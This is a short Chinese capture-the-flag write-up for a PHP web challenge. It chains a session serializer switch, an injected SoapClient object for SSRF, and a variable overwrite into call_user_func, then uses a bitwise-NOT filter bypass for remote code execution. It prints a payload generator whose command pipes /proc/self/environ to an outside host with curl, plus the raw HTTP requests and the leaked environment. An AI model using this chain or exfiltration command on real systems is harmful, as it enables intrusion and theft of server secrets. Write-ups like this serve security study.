sakura writeup
签到
一个跳转 curl完事
web
ezphp
利用回调函数覆盖session序列化引擎为php_serilaze
,构造SSRF的Soap
类的序列化字符串配合序列化注入写入session文件,然后利用变量覆盖漏洞,覆盖掉变量b为回调函数call_user_func
,此时结合我刚开始所说的回调函数调用Soap
类的未知方法,触发__call
方法进行SSRF访问flag.php
。
利用取反绕过正则过滤,造成RCE。
1 2 3 4 5 6 7 8
| <?php $str = 'cat /proc/self/environ | curl -H "Content-Type: application/json" -X POST --data-binary @- ip'; $shell = urlencode(~$str); $url = "http://127.0.0.1/flag.php?i=(~%8C%86%8C%8B%9A%92)(~$shell);"; echo $url."\r\n\r\n"; $slen = strlen($url); $a = '|O:10:"SoapClient":3:{s:3:"uri";s:'.$slen.':"'.$url.'";s:8:"location";s:'.$slen.':"'.$url.'";s:13:"_soap_version";i:1;}'; echo urlencode($a);
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /index.php?f=session_start&name=上面生成的 HTTP/1.1 Host: 8.130.177.132:15294 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=bbb Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 31
serialize_handler=php_serialize
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /index.php?f=extract&name=SoapClient HTTP/1.1 Host: 8.130.177.132:15294 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=bbb Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 16
b=call_user_func
|
读一下环境变量 cat /proc/self/environ
1
| PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgiUSER=www-dataHOSTNAME=838bfba2cdd2PHP_INI_DIR=/usr/local/etc/phpSHLVL=2HOME=/home/www-dataPHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -piePHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2PHP_MD5=PHP_VERSION=7.0.33GPG_KEYS=1A4E8B7277C42E53DBA9C7B9BCAA30EA9C0D5763 6E4F6AB321FDC07F2C332E3AC2BF0BC433CFC8B3PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2PHP_ASC_URL=https://secure.php.net/get/php-7.0.33.tar.xz.asc/from/this/mirrorPHP_URL=https://secure.php.net/get/php-7.0.33.tar.xz/from/this/mirrorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binPHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2cPWD=/var/www/htmlPHP_SHA256=ab8c5be6e32b1f8d032909dedaaaa4bbb1a209e519abb01a52ce3914f9a13d96FLAG=flag{ISEC-0e165f5593f2246bc53b395b7810c220}
|